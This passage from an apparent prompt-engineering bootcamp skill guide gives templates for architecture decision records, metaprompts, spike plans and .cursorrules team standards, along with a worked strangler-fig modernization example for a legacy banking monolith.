Generates prompts that generate prompts — the key differentiator for tech leadership:
```
Metaprompt: A prompt that, when given to team members or AI assistants,
produces role-specific guidance (e.g., "Architect a caching strategy" prompt
that generates backend engineer, DevOps engineer, and QA engineer prompts)
```
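A minimal sketch of how such a metaprompt can be assembled mechanically. The topic, roles, and constraints below are illustrative placeholders, not part of the skill's contract:

```python
def build_metaprompt(topic: str, roles: list[str],
                     constraints: list[str]) -> str:
    """Return a prompt that asks a model to generate role-specific prompts."""
    role_lines = "\n".join(
        f"- {role}: one prompt scoped to that role's responsibilities"
        for role in roles
    )
    constraint_lines = "\n".join(f"- {c}" for c in constraints)
    return (
        "You are generating prompts, not solutions.\n"
        f"Topic: {topic}\n"
        f"Every generated prompt must respect these constraints:\n{constraint_lines}\n"
        f"Produce exactly one prompt per role:\n{role_lines}"
    )

meta = build_metaprompt(
    "Caching strategy design",
    ["Backend engineer", "DevOps engineer", "QA engineer"],
    ["p99 latency under 100ms", "no new managed services"],
)
print(meta)
```

Feeding `meta` to a model yields the Level-2 role-specific prompts; the constraints travel with every branch, which is what keeps the generated guidance consistent across roles.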
### 4. Structured Output Formats
- **Architecture Decision Record (ADR)**: Context, Decision, Options Evaluated, Consequences
- **Metaprompt**: Hierarchical prompt with role-specific branches
- **Technical Spike Plan**: Investigation scope, success criteria, decision gates, time-box
- **Team Standards File**: .cursorrules or .windsurfrules with patterns and anti-patterns
---
## Usage Scenarios
Choose the scenario matching your current leadership challenge:
### **Scenario A: Architecture Decision Record (ADR)**
*Major architectural choice with lasting impact; requires systematic evaluation*
**When to use**: "Should we decompose our monolith or use strangler fig pattern?"
**What you'll get**: 3 options evaluated via Tree of Thoughts, ADR document, implementation roadmap
### **Scenario B: Metaprompting**
*Create team-specific AI workflows; build prompts that generate prompts*
**When to use**: "I need each engineer to get role-specific architecture guidance"
**What you'll get**: Metaprompt with engineer/DevOps/QA/security role branches, usage examples
### **Scenario C: Technical Spike Planning**
*Scope investigation work, define decision criteria, time-box unknowns*
**When to use**: "We need to evaluate if we should migrate to Kubernetes"
**What you'll get**: Spike plan with investigation phases, success criteria, decision gates, 1-2 week time-box
### **Scenario D: Team Technical Standards**
*Codify architectural patterns, create .cursorrules for AI-assisted development*
**When to use**: "Our team needs shared standards for async/await, error handling, logging"
**What you'll get**: .cursorrules file with patterns, anti-patterns, examples, and rationale
---
## Structured Interrogation Framework
The skill will ask you these questions to build architectural context:
### Phase 1: Current Architecture (6-8 questions)
1. **Current System Design**: Monolith? Microservices? Event-driven? Hybrid?
2. **Technology Stack**: Languages, frameworks, databases, message queues, key versions?
3. **Scale Context**: Transactions/sec? Users? Data volume? Growth rate?
4. **Team Size & Skills**: How many engineers? Key expertise areas? Skill gaps?
5. **Operational Maturity**: CI/CD setup? Monitoring? On-call model? Incident response process?
6. **Technical Debt**: What's the biggest pain point? What slows down development?
### Phase 2: Target State & Constraints (4-5 questions)
7. **Strategic Goal**: What problem are we solving? What's the business driver?
8. **Success Metrics**: How will we know this decision was right? (Latency? Throughput? Developer velocity?)
9. **Hard Constraints**: Budget limits? Timeline? Compliance/security requirements? Team availability?
10. **Integration Requirements**: What other systems must this integrate with? Dependencies?
### Phase 3: Organizational Context (3-4 questions)
11. **Team Maturity**: Can the team handle microservices? Distributed systems? New frameworks?
12. **Organizational Appetite for Change**: How much disruption is acceptable? What's the change window?
13. **Support & Tooling**: What infrastructure already exists? What would we need to build?
14. **Decision Authority**: Who decides? What's the approval process?
### Phase 4: Risk & Knowledge (2-3 questions)
15. **Similar Decisions**: Have we done something like this before? What worked/didn't?
16. **Hidden Risks**: What keeps you up at night about this decision?
17. **Decision Timeline**: When does this decision need to be made? How long to implement?
---
## Output Format Specification
### 1. Architecture Decision Record (ADR) with Tree of Thoughts
```
## ADR-NNN: [Decision Title]
### Context
- **Problem Statement**: What decision are we making and why?
- **Constraints**: Timeline, budget, team size, technical/organizational limits
- **Success Criteria**: How will we measure if this was the right choice?
### Options Generated (Tree of Thoughts)
All options are fundamentally different approaches, not variations on one idea.
#### Option A: [Approach Name]
**THINK**: How would this work?
- Architecture sketch
- Key components
- Implementation steps
**EVALUATE**: What are the trade-offs?
**Pros**:
- Aligned with team's async-first expertise
- Integrates with existing event bus
- Reduces deployment complexity by 40%
**Cons**:
- Requires learning a new framework (a month of ramp-up)
- Database migration needed (2-3 weeks downtime risk)
- Limited ecosystem for advanced features
**Risks**:
- [ ] High: Team has no experience with this pattern
- [ ] Medium: Performance impact on latency-sensitive paths
- [ ] Low: Vendor lock-in on managed service
#### Option B: [Approach Name]
**THINK**: How would this work?
- Architecture sketch
- Key components
- Implementation steps
**EVALUATE**: What are the trade-offs?
**Pros**:
- Team already knows this pattern
- Drop-in replacement for existing system
- Zero database migration needed
**Cons**:
- Doesn't solve scalability issue (5x growth)
- Tight coupling increases technical debt
- Deployment remains slow (30min per release)
**Risks**:
- [ ] High: Can't scale beyond current hardware
- [ ] Low: Team complacency if we don't modernize
- [ ] Medium: Vendor might discontinue support
#### Option C: [Approach Name]
**THINK**: How would this work?
- Architecture sketch
- Key components
- Implementation steps
**EVALUATE**: What are the trade-offs?
**Pros**:
- Industry-standard, proven at scale
- Excellent tooling and community support
- Phased migration possible (no big bang)
**Cons**:
- Requires hiring 2 new specialists ($200K)
- Operational complexity increases significantly
- Steep learning curve for existing team
**Risks**:
- [ ] Medium: Budget overrun on hiring/training
- [ ] Medium: Team turnover if overwhelmed
- [ ] Low: Overengineering for current scale
### Decision
**CHOOSE**: Option [A/B/C]
**Rationale**:
- Best aligns with constraint: [which one]
- Team capability fit: [how well]
- Risk mitigation: [which risks are we accepting]
- Implementation timeline: [realistic estimate]
### Consequences
#### Positive
- Unblocks team for feature velocity
- Reduces technical debt in [specific area]
- Aligns with 3-year platform roadmap
#### Negative
- Requires 6-week learning curve
- Database migration has 2hr maintenance window
- Initial performance tuning needed (2 weeks)
#### Action Items
- [ ] Spike: Create proof-of-concept (1 week)
- [ ] Plan: Detailed migration roadmap (1 week)
- [ ] Team: Schedule training sessions (4 weeks before go-live)
- [ ] Infrastructure: Provision staging environment (parallel to above)
- [ ] Communication: Announce decision and timeline to stakeholders
---
```
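Because the skeleton is this regular, an ADR can also be rendered from structured data. A minimal sketch — the field names here are illustrative, not part of the skill's contract:

```python
from dataclasses import dataclass

@dataclass
class Option:
    name: str
    pros: list[str]
    cons: list[str]
    risks: list[str]   # e.g. "High: team has no experience with this pattern"

@dataclass
class ADR:
    number: int
    title: str
    problem: str
    options: list[Option]
    chosen: str
    rationale: list[str]

def render(adr: ADR) -> str:
    """Emit the ADR in the markdown skeleton shown above."""
    lines = [f"## ADR-{adr.number:03d}: {adr.title}",
             "### Context",
             f"- **Problem Statement**: {adr.problem}",
             "### Options Generated (Tree of Thoughts)"]
    for label, opt in zip("ABC", adr.options):
        lines += [f"#### Option {label}: {opt.name}", "**Pros**:"]
        lines += [f"- {p}" for p in opt.pros]
        lines.append("**Cons**:")
        lines += [f"- {c}" for c in opt.cons]
        lines.append("**Risks**:")
        lines += [f"- [ ] {r}" for r in opt.risks]
    lines += ["### Decision", f"**CHOOSE**: {adr.chosen}", "**Rationale**:"]
    lines += [f"- {r}" for r in adr.rationale]
    return "\n".join(lines)
```

Keeping ADRs as data makes them diffable and lets a script list every decision that accepted a given risk level.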
### 2. Metaprompt Structure
```
# Metaprompt: [Topic - e.g., "Caching Strategy Design"]
## Role: [System Architect]
### Primary Mission
Generate a [caching strategy] for [context] that:
- Meets performance targets: [specific metrics]
- Respects constraints: [budget, team, operational limits]
- Follows team patterns: [specific patterns/standards]
### Interrogation Phase
Ask the team member these questions to build context:
**System Context**:
1. What's the current cache topology?
2. What's the primary bottleneck? (CPU? I/O? Network?)
3. What's the acceptable cache invalidation latency?
**Team Context**:
4. Does the team have Redis expertise?
5. What's the operational overhead appetite?
### Generation Phase
For each question answered, generate:
**For Backend Engineer**:
- Code examples for cache client integration
- Error handling patterns
- Testing strategy (mocked cache, real cache, cache failure scenarios)
**For DevOps Engineer**:
- Infrastructure requirements (Redis cluster size, failover setup)
- Monitoring/alerting strategy
- Disaster recovery and backup procedures
**For QA Engineer**:
- Cache hit/miss ratio testing
- Load testing strategy
- Failure scenario testing (cache outage, network partition)
**For Security Engineer**:
- Data sensitivity of cached items
- TTL strategy for sensitive data
- Access control and encryption needs
### Rationale
- Caching at [layer] because: [specific reason]
- [Pattern name] chosen because: [tradeoff analysis]
- TTL of [X] balances [freshness vs. hits]
---
```
### 3. Technical Spike Plan
```
## Technical Spike: [Investigation Topic]
### Objective
**Question**: Should we migrate to [technology/pattern]?
**Success Criteria**:
- [ ] Proof-of-concept running
- [ ] Performance benchmarks vs. current system
- [ ] Team impact assessment (learning curve, hiring needs)
- [ ] Cost/benefit analysis with 3-year projection
- [ ] Risk mitigation strategy documented
### Investigation Phases (1-2 weeks total)
#### Phase 1: Discovery (3 days)
**THINK**: What are we actually investigating?
- Read architecture docs of target technology
- Identify key decision points
- Map to current system constraints
**ACT**:
- [ ] Create minimal POC (single component)
- [ ] Document assumptions
**OBSERVE**:
- [ ] Does the POC work as expected?
- [ ] Did we discover new constraints?
#### Phase 2: Evaluation (3-4 days)
**THINK**: How does this perform vs. our requirements?
- Latency benchmarks
- Scalability testing
- Operational complexity assessment
**ACT**:
- [ ] Run performance tests under load
- [ ] Document operational requirements
- [ ] Interview experts who've used this
**OBSERVE**:
- [ ] Performance targets met/missed?
- [ ] Team capability realistic?
#### Phase 3: Decision Gates (1-2 days)
**THINK**: Can we make a recommendation?
- Compile findings
- Create decision matrix
- Assess risks
**ACT**:
- [ ] Create summary document
- [ ] Present findings to stakeholders
**OBSERVE**:
- [ ] Is the recommendation clear?
- [ ] Can we commit to next steps?
### Decision Gates
| Gate | Criteria | Owner | Target Date |
|------|----------|-------|-------------|
| **POC Success** | POC runs on developer laptop | [Engineer] | Day 3 |
| **Performance** | Meets latency targets, 50% throughput improvement | [Engineer] | Day 6 |
| **Team Fit** | Team learning curve acceptable, or hiring plan clear | [TL] | Day 7 |
| **Financial** | 3-year TCO justifies migration cost | [PM] | Day 8 |
### Not in Scope (Explicitly)
- Full migration plan (save for post-decision work)
- Integration with all downstream systems
- Vendor negotiation
- Detailed architecture design
---
```
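The decision-gate table lends itself to living as data too, so a script can flag open gates past their target date. A sketch — the field names and dates are illustrative:

```python
from dataclasses import dataclass
from datetime import date

@dataclass
class Gate:
    name: str
    criteria: str
    owner: str
    target: date
    passed: bool = False

def overdue(gates: list[Gate], today: date) -> list[str]:
    """Names of gates past their target date and still open."""
    return [g.name for g in gates if not g.passed and g.target < today]

gates = [
    Gate("POC Success", "POC runs on developer laptop", "Engineer",
         date(2026, 4, 3), passed=True),
    Gate("Performance", "Meets latency targets", "Engineer", date(2026, 4, 6)),
]
print(overdue(gates, date(2026, 4, 8)))  # → ['Performance']
```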
### 4. Team Technical Standards File (.cursorrules)
```
# .cursorrules - Team Technical Standards for [Project]
## Vision
[1 sentence: What architectural pattern defines our work?]
Example: "We are an async-first microservices team that values consistency and observable deployments."
## Core Patterns
### 1. Async/Await Design
When to use async:
- All I/O operations (network, database, file system)
- All service-to-service communication
- Never block request threads
```python
# PATTERN: Async I/O
async def get_user(user_id: int):
    """Correct: returns an awaitable, never blocks"""
    # Parameterized query; never interpolate user input into SQL
    user = await db.query("SELECT * FROM users WHERE id = $1", user_id)
    return user

# ANTI-PATTERN: Blocking I/O
def get_user(user_id: int):
    """Wrong: blocks the request thread, kills throughput"""
    user = requests.get(f"https://userapi.com/{user_id}")
    return user
```
### 2. Error Handling
Pattern: Explicit exceptions + structured logging
```python
# PATTERN: Named exceptions with context
class PaymentProcessingError(Exception):
    def __init__(self, user_id: int, amount: float, reason: str):
        super().__init__(reason)
        self.user_id = user_id
        self.amount = amount
        self.reason = reason

try:
    await process_payment(user_id, amount)
except PaymentProcessingError as e:
    logger.error("payment_failed", extra={
        "user_id": e.user_id,
        "amount": e.amount,
        "reason": e.reason,
    })
    raise

# ANTI-PATTERN: Generic exceptions
try:
    process_payment(user_id, amount)
except Exception as e:
    logger.error(f"Error: {e}")  # No context!
```
### 3. Logging Standards
Pattern: Structured JSON, never string interpolation
```python
# PATTERN: Structured logging
logger.info("order_created", extra={
    "order_id": order.id,
    "user_id": order.user_id,
    "amount": order.total,
    "items_count": len(order.items),
})

# ANTI-PATTERN: String formatting
logger.info(f"Order {order.id} created for user {order.user_id}")  # Not queryable!
```
### 4. Service Boundaries
Pattern: Clear input/output contracts, versioned APIs
```python
# PATTERN: Explicit contracts
@router.post("/v1/orders")
async def create_order(request: CreateOrderRequest) -> CreateOrderResponse:
    """
    Input contract: CreateOrderRequest (pydantic model)
    Output contract: CreateOrderResponse
    Versioning: URL path includes version
    """
    ...

# ANTI-PATTERN: Implicit contracts
@router.post("/orders")
def create_order(data):  # What's expected? What's returned?
    return {"order_id": 123}
```
## Anti-Patterns
### ❌ Circular Dependencies
```python
# WRONG: Service A imports Service B imports Service A
# Fix: Use message queue or shared interface
```
### ❌ Blocking Operations in Async Code
```python
# WRONG
async def get_data():
    time.sleep(1)  # Blocks the entire event loop!

# RIGHT
async def get_data():
    await asyncio.sleep(1)
```
### ❌ Monolithic Error Handlers
```python
# WRONG
try:
    orchestrate_entire_workflow()
except Exception:
    logger.error("Something went wrong")

# RIGHT
try:
    result = await step1()
except Step1Error as e:
    logger.error("step1_failed", extra={"reason": e.reason})
    # Handle step1-specific failure

try:
    result = await step2(result)
except Step2Error as e:
    logger.error("step2_failed", extra={"reason": e.reason})
    # Handle step2-specific failure
```
## Code Review Checklist
- [ ] No synchronous I/O in async functions
- [ ] All exceptions named and contextual
- [ ] Logging is structured JSON, queryable
- [ ] Service boundaries clear (input/output contracts)
- [ ] No circular dependencies
- [ ] Tests cover happy path + at least 2 error scenarios
- [ ] Type hints on all function signatures
## When to Break These Patterns
Only with explicit TL approval and documented rationale.
File issue: `patterns: [pattern-name]: [reason for exception]`
---
```
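The structured-logging standard above depends on `extra={}` fields surviving into queryable output, which only happens if a JSON formatter emits them. A stdlib-only sketch of one way to do it (not the only way — `python-json-logger` is a common off-the-shelf alternative):

```python
import json
import logging

class JsonFormatter(logging.Formatter):
    """Render each record as one JSON object so extra= fields stay queryable."""
    # Attributes every LogRecord has; anything else arrived via extra=
    _STANDARD = set(vars(logging.makeLogRecord({})))

    def format(self, record: logging.LogRecord) -> str:
        payload = {"event": record.getMessage(), "level": record.levelname}
        payload.update(
            {k: v for k, v in vars(record).items() if k not in self._STANDARD}
        )
        return json.dumps(payload)

handler = logging.StreamHandler()
handler.setFormatter(JsonFormatter())
logger = logging.getLogger("orders")
logger.addHandler(handler)
logger.setLevel(logging.INFO)

logger.info("order_created", extra={"order_id": 42, "user_id": 7})
# emits {"event": "order_created", "level": "INFO", "order_id": 42, "user_id": 7}
```

The diff against `makeLogRecord({})` is what separates standard record attributes from the caller-supplied `extra` fields without hard-coding a list.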
---
## Using the Skill: Step-by-Step Workflow
### Step 1: Choose Your Scenario
```
"We need to decide: monolith or microservices?"
→ Scenario A (Architecture Decision Record)
"I want to teach our engineers to make consistent caching decisions"
→ Scenario B (Metaprompting)
"Should we invest in Kubernetes? Need to understand before committing"
→ Scenario C (Technical Spike Planning)
"Our async code is inconsistent; need shared standards"
→ Scenario D (Team Technical Standards)
```
### Step 2: Let the Skill Interrogate
The skill will ask 15-17 questions. **Answer fully and honestly** — this is where decision quality happens.
Example interrogation flow for Scenario A:
```
Q1: Current architecture?
A: Monolithic Django app, 300K lines, 8-person team
Q2: What's driving the decision?
A: Deployment pipeline is slow (30min per release), tightly coupled services
Q3: Team's distributed systems experience?
A: Limited; one engineer has microservices experience at previous company
Q4: Non-functional requirements?
A: Need to ship 5x faster, scale to 10M users (currently 1M)
Q5: Budget?
A: Can hire 2 new engineers, but not unlimited
[... continues through all 15+ questions ...]
```
### Step 3: Review Generated Artifacts
The skill will output:
- ✅ ADR with Tree of Thoughts (3 options evaluated)
- ✅ Risk assessment for each option
- ✅ Decision with clear rationale
- ✅ Consequences (positive, negative, action items)
Or (depending on scenario):
- ✅ Metaprompt with role-specific branches
- ✅ Technical spike plan with decision gates
- ✅ .cursorrules file with patterns and examples
### Step 4: Communicate & Execute
Use the generated artifact to:
- Share decision with stakeholders (ADR)
- Guide team members (Metaprompt)
- Scope investigation work (Spike Plan)
- Enforce team standards (Standards File)
---
## Design Principles
### Principle 1: Context Over Templates
**Never recommend a pattern without understanding:**
- What problem does this solve?
- What constraints does the team face?
- What is the team capable of executing?
- What are the realistic consequences?
The interrogation phase ensures we have rich architectural context before any recommendation.
### Principle 2: Structure Over Intuition
**Always output:**
- Structured decision matrices (not narratives)
- Risk assessments (not "it should work")
- Checklists (not suggestions)
- Testable criteria (not vague success)
Bootcamp intuition: Structure gets rewarded.
### Principle 3: Multiple Options by Default
**Tree of Thoughts requires:**
- 3+ fundamentally different approaches (not variations)
- Honest evaluation of trade-offs (pros/cons/risks)
- Clear decision rationale (why we chose this one)
- Risk acceptance acknowledgment (what are we giving up)
This prevents premature convergence on a familiar option.
### Principle 4: Team Capability Matters
**Always respect:**
- Team size and skill composition
- Learning curve for new patterns
- Operational overhead they can sustain
- Organizational appetite for change
This is where interrogation questions pay dividends.
---
## Example: Complete Workflow
### Scenario: Architecture Decision Record
**You say:**
```
We have a legacy banking system (Java monolith, 20 years old, 500K lines).
We need to modernize it, but can't afford downtime or a complete rewrite.
Should we decompose it or use strangler fig pattern?
```
**Skill interrogates (Phase 1: Current Architecture):**
```
Q1: Current system structure?
→ Monolithic Java app, tightly coupled, 50+ teams writing to it
Q2: Technology stack?
→ Java 8, Spring 3.2, Oracle database, 2.5GB data, batch jobs at 2am
Q3: Scale?
→ 100K transactions/day, 1ms latency requirement, 99.99% uptime
Q4: Team composition?
→ 50 Java engineers, 5 DevOps, no Go/Rust experience
Q5: Technical debt?
→ No API contracts, shared database, monolithic deployments
```
**Skill interrogates (Phase 2: Target State & Constraints):**
```
Q6: What's the business driver?
→ Need to ship faster (currently 3 weeks per feature), reduce outages
Q7: Success metrics?
→ Deploy weekly, feature velocity +300%, reduce outages by 80%
Q8: Hard constraints?
→ Can't have >5 min downtime, budget is $500K for next year, timeline is 18 months
Q9: Integration requirements?
→ Must talk to 10 other systems via APIs
```
**Skill interrogates (Phase 3: Organizational Context):**
```
Q10: Team maturity?
→ Good at Java, but distributed systems is new territory
Q11: Change appetite?
→ Executive pressure to modernize, but risk-averse on production
Q12: What already exists?
→ CI/CD is solid (Jenkins), monitoring basic (Splunk), no Kubernetes
```
**Skill generates: ADR with Tree of Thoughts**
```markdown
## ADR-042: Legacy Banking System Modernization Strategy
### Context
- **Problem**: Monolithic Java app (500K lines, 50 teams) blocks feature velocity
and creates deployment risk
- **Constraints**:
- Can't tolerate >5min downtime
- 18-month timeline
- 50 Java engineers (no distributed systems experience)
- $500K budget
- **Success Criteria**:
- Weekly deployments (vs. 3 weeks today)
- Reduce outages by 80%
- Feature team velocity +300%
### Options Generated (Tree of Thoughts)
#### Option A: Big Bang Microservices Rewrite
**THINK**: Complete rewrite to microservices
Architecture:
- Decompose into 15 domain-driven microservices
- Each service: own database, async communication via message queue
- Migrate all 50 teams into new services
- Sunset monolith over 18 months
**EVALUATE**:
**Pros**:
- Clean slate, no legacy code baggage
- Team expertise naturally distributed
- True decoupling, independent deployments
**Cons**:
- 18-month timeline is VERY tight for 500K LOC
- Requires hiring distributed systems experts we don't have
- Monolith must run in parallel → 2x infrastructure cost
- High organizational disruption (teams restructure)
- No way to incrementally validate approach
**Risks**:
- [ ] **High**: Timeline will slip (probably 24-30 months realistically)
- [ ] **High**: Quality issues in new system (unproven architecture)
- [ ] **Medium**: Team burnout (learning curve + feature delivery)
- [ ] **High**: Can't stop in middle; fully committed
- [ ] **Medium**: Coordination overhead (15 teams, new patterns)
---
#### Option B: Strangler Fig Pattern (Incremental)
**THINK**: New services gradually replace monolith functions
Architecture:
- Deploy API Gateway in front of monolith
- For each domain: build new microservice alongside monolith
- Route traffic gradually to new service
- Monolith shrinks over time as services take over
- Databases remain coupled initially, decouple incrementally
**EVALUATE**:
**Pros**:
- Incremental validation: prove each service works before next
- Can stop at any point with useful system
- Teams can move independently (minimal coordination)
- Less organizational disruption
- Leverage existing Java expertise; grow distributed systems knowledge gradually
- 18-month timeline is achievable
**Cons**:
- Temporary duplication (gateway routes to both systems)
- Database coupling remains longer (harder to scale)
- Initial velocity might drop (building alongside shipping)
- Requires discipline to retire monolith code (technical debt temptation)
**Risks**:
- [ ] **Medium**: Gateway becomes bottleneck (mitigated by load testing)
- [ ] **Low**: Teams lose focus (mitigated by clear roadmap)
- [ ] **Medium**: Database refactoring delayed too long (needs explicit schedule)
- [ ] **Low**: Monolith stays forever (organizational discipline needed)
---
#### Option C: Hybrid: Extract Bounded Contexts in Monolith
**THINK**: Modularize monolith first; extract microservices later if needed
Architecture:
- Apply DDD: identify 5-7 bounded contexts within monolith
- Refactor monolith into internal services (compile-time modules, not runtime services)
- After stabilization (6-12 months), extract into actual microservices if needed
- More conservative approach with proven deployment
**EVALUATE**:
**Pros**:
- Uses team's existing Java expertise fully
- No dual system running in parallel
- Lower infrastructure cost (single deployment)
- Fast initial wins (improved code organization)
- Proven pattern with many successful examples
**Cons**:
- Doesn't truly solve monolithic deployment problem
- Still shared database and tightly coupled at runtime
- Team structure still monolithic (harder to ship independently)
- May require rework if microservices become necessary later
- Doesn't address 18-month timeline pressure
**Risks**:
- [ ] **High**: Never makes the jump to true microservices (organizational complacency)
- [ ] **Medium**: Refactoring effort delays feature work initially
- [ ] **Low**: Bounded contexts are wrong (revisit after 6 months)
---
### Decision
**CHOOSE: Option B (Strangler Fig Pattern)**
**Rationale**:
- **Constraint fit**: 18-month timeline is achievable with incremental approach; Big Bang too risky; Hybrid doesn't solve the problem
- **Team capability**: Leverages Java expertise, allows gradual learning curve for distributed systems
- **Risk profile**: Can validate each service before committing fully; can pause and still have a working system
- **Business alignment**: Weekly deploys by month 12; outage reduction measurable every quarter; feature velocity improves with each new service
- **Organizational change**: Gradual team restructuring vs. complete disruption
### Consequences
#### Positive
- **Monthly wins**: One new service every 4-6 weeks = visible progress
- **Reduced deployment risk**: Canary deploy each new service independently
- **Knowledge transfer**: Team learns microservices patterns incrementally
- **Optionality**: Can pause at month 12 with 7 services extracted and still succeed
#### Negative
- **Temporary overhead**: Gateway routing, database coupling for 12-18 months
- **Coordination complexity**: Monolith + new services must stay in sync
- **Developer experience**: Some friction around API Gateway debugging
- **Timeline pressure**: Any delays in first services cascade
#### Risks We Accept
- [x] Medium: Gateway becomes bottleneck → Mitigated by aggressive load testing by month 2
- [x] Medium: Database refactoring gets delayed → Mitigated by explicit roadmap (must extract by month 15)
- [x] Low: Organizational discipline fades → Mitigated by clear success metrics per service
### Action Items
- [ ] **Month 1**: Design API Gateway, identify first 3 domains to extract
- [ ] **Month 1**: Hire distributed systems consultant for 3-month engagement
- [ ] **Month 2**: Proof-of-concept: extract first service (Payments domain)
- [ ] **Month 3**: Load test Gateway with production traffic patterns
- [ ] **Month 4**: Go live with Service 1, monitor closely
- [ ] **Month 6**: Complete Services 2-3, celebrate progress internally
- [ ] **Month 12**: 7 services extracted, weekly deployments active
- [ ] **Month 18**: Critical remaining domains extracted; evaluate: keep Gateway or full microservices?
### Implementation Roadmap
| Service | Start | Live | Database | Teams |
|---------|-------|------|----------|-------|
| Payments | M2 | M4 | Shared (couple with existing) | Finance (5) |
| Accounts | M3 | M5 | Own DB (M8) | Customer (4) |
| Transactions | M4 | M6 | Own DB (M10) | Core Ops (6) |
| Compliance | M5 | M7 | Shared initially | Risk (3) |
| Reporting | M6 | M8 | Read replicas | Analytics (2) |
| Fraud Detection | M7 | M9 | Own DB (M14) | Security (4) |
| API Orchestration | M8 | M10 | N/A | Platform (4) |
---
```
**Skill generates: Risk Mitigation Strategy**
```markdown
## Risk Mitigation for Strangler Fig Pattern
### High-Risk: Gateway Becomes Bottleneck
**Mitigation**:
- Load test by month 2 with production traffic patterns
- Design Gateway with horizontal scaling from day 1
- Monitor latency; alert if p99 > 50ms
### Medium-Risk: Database Refactoring Gets Postponed
**Mitigation**:
- Hard deadline: Service X must have own database by month Y
- Include in sprint goals, not "nice to have"
- Track database coupling metric (% queries to old DB)
### Medium-Risk: Coordination Chaos
**Mitigation**:
- Weekly architecture sync (30 min)
- Shared schema change process (coordinate API Gateway routes)
- Runbooks for common failure scenarios
---
```
**Skill generates: Team Communication Template**
```markdown
## ADR-042 Communication: Monolith Modernization Strategy
### For Executive Leadership
"We're adopting an incremental microservices approach. Monthly progress visible.
Weekly deployments by month 12. Total cost $500K, achievable in 18 months."
### For Engineering Teams
"Your team gets a dedicated microservice in the next 6-9 months. Learn distributed
systems patterns alongside delivery. First service goes live month 4. Async
communication and database design are new skills we'll master together."
### For DevOps
"New API Gateway to manage. Deployment process extends to cover new services.
On-call remains unified initially. Increased monitoring complexity. Budget for
tools by month 3."
---
```
---
## Advanced Usage: Combining with Bootcamp Patterns
### Using with Priority Builder Pattern
Map tech leadership work to ABCD:
```
Action: Make strangler fig decision (your architecture choice)
Behavior: Tree of Thoughts evaluation, 3 options rigorously assessed
Context: Team maturity, budget, timeline, scale requirements
Delivered: ADR document, implementation roadmap, risk mitigation
```
### Using with ReAct Pattern
Systematic technical investigation:
```
THINK: What questions do we need answered? (What's unknown about this approach?)
ACT: Run spike investigation, gather data (Build POC, run benchmarks, interview experts)
OBSERVE: Did we learn enough to decide? (Decision gates met? Risks understood?)
```
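That loop can be sketched as code, with placeholder callables you'd supply yourself (LLM calls, spike scripts, gate checks — all illustrative):

```python
from typing import Callable

def react_loop(question: str,
               think: Callable[[str], str],
               act: Callable[[str], str],
               observe: Callable[[str], bool],
               max_rounds: int = 3) -> list[dict]:
    """Run THINK -> ACT -> OBSERVE until a decision gate passes."""
    trace, context = [], question
    for round_no in range(1, max_rounds + 1):
        plan = think(context)        # THINK: what's still unknown?
        evidence = act(plan)         # ACT: run the spike step
        decided = observe(evidence)  # OBSERVE: is the gate met?
        trace.append({"round": round_no, "plan": plan,
                      "evidence": evidence, "decided": decided})
        if decided:
            break
        context = f"{question}\nEvidence so far: {evidence}"
    return trace
```

The time-box maps to `max_rounds`: the loop either hits a decision gate or exits with a trace documenting why the spike was inconclusive.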
### Using with Tree of Thoughts
Multi-option evaluation (the core TL pattern):
```
GENERATE: What are 3 fundamentally different approaches? (Not variations)
EVALUATE: What are pro/con/risk for each? (Honest assessment)
CHOOSE: Which best fits constraints? (Clear rationale, risk acceptance)
```
### Metaprompting for Team Amplification
Build a hierarchy of prompts:
```
Level 1: Metaprompt for architects ("Design caching strategy")
Level 2: Role-specific prompts generated by metaprompt
- Backend engineer: "Implement cache client"
- DevOps: "Infrastructure for Redis cluster"
- QA: "Test cache hit/miss scenarios"
- Security: "Sensitive data handling in cache"
Level 3: Each role-specific prompt generates task assignments
```
---
## When to Use This Skill vs. Meetings
| Task | Use Meeting | Use Skill |
|------|-------------|-----------|
| Casual brainstorm | ✅ Meeting | ❌ Overkill |
| Whiteboard architecture | ✅ Meeting | ❌ Overkill |
| **Major architectural decision** | ❌ Ad-hoc | ✅ **This skill** |
| **Codify team standards** | ❌ Loose guidance | ✅ **This skill** |
| **Scope technical investigation** | ❌ Vague | ✅ **This skill** |
| **Create prompts for team** | ❌ Inconsistent | ✅ **This skill** |
| **Document decision rationale** | ❌ Lost in Slack | ✅ **This skill** |
| **Train new engineers on patterns** | ❌ Tribal knowledge | ✅ **This skill** |
---
## Bootcamp Integration
### For Facilitators
Use this skill in **Session 3: Tech Leadership Patterns** when discussing:
- Tree of Thoughts pattern (GENERATE → EVALUATE → DECIDE)
- Metaprompting (prompts that generate prompts)
- Risk-aware decision-making
- Real-world architecture examples
### For Participants (Tech Lead Role-Fork Exercise)
**Use this skill when:**
- You're the "Tech Lead" in a role-fork scenario
- You need to make a major architectural decision
- You're building team technical standards
- You're scoping investigation work
- You need to communicate rationale to leadership
**Expected outcome:**
- Understand how structured interrogation builds architectural context
- See Tree of Thoughts in action with real trade-off analysis
- Generate production-quality ADRs and team standards
- Learn metaprompting for team amplification
---
## FAQ
**Q: Will this skill make decisions for me?**
A: No. It structures your thinking and gathers context. You make the final decision, but with better information.
**Q: How is this different from just discussing architecture?**
A: Structured interrogation ensures we don't miss constraints. Tree of Thoughts prevents premature convergence on familiar options. Written ADR becomes a team reference document.
**Q: Can I use this for small decisions?**
A: Yes, but it might be overkill for decisions that are reversible, low-risk, or have established precedent. Use your judgment.
**Q: What if I disagree with the generated options?**
A: Tell the skill during interrogation: "Our team is expert in [pattern], so that's a given." It will adjust.
**Q: How do I present an ADR to leadership?**
A: Use the generated ADR as-is. It's written for that audience. Highlight the decision, rationale, and consequences section.
**Q: Can I use this for hiring or team decisions?**
A: This skill focuses on technical architecture. For people decisions, you'll want a different tool.
**Q: How often should I create metaprompts?**
A: Create one whenever you notice yourself giving the same architectural guidance repeatedly. That's a signal it should be codified.
---
## References
- **Tree of Thoughts**: Yao et al. (2023) "Tree of Thoughts: Deliberate Problem Solving with Large Language Models"
- **Architecture Decision Records**: Nygard (2011) "Documenting Architecture Decisions"
- **Domain-Driven Design**: Evans (2003) "Domain-Driven Design"
- **Strangler Fig Pattern**: Fowler (2004) "Strangler Application"
- **Metaprompting**: Eisenschlos et al. (2022) "Reframing Instructional Prompts as Definition Pairs"
- **ReAct Pattern**: Yao et al. (2022) "ReAct: Synergizing Reasoning and Acting in Language Models"
---
**Version**: 1.0
**Last Updated**: 2026-03-18
**For**: Joey's Prompt Engineering Bootcamp v2 — Tech Lead Track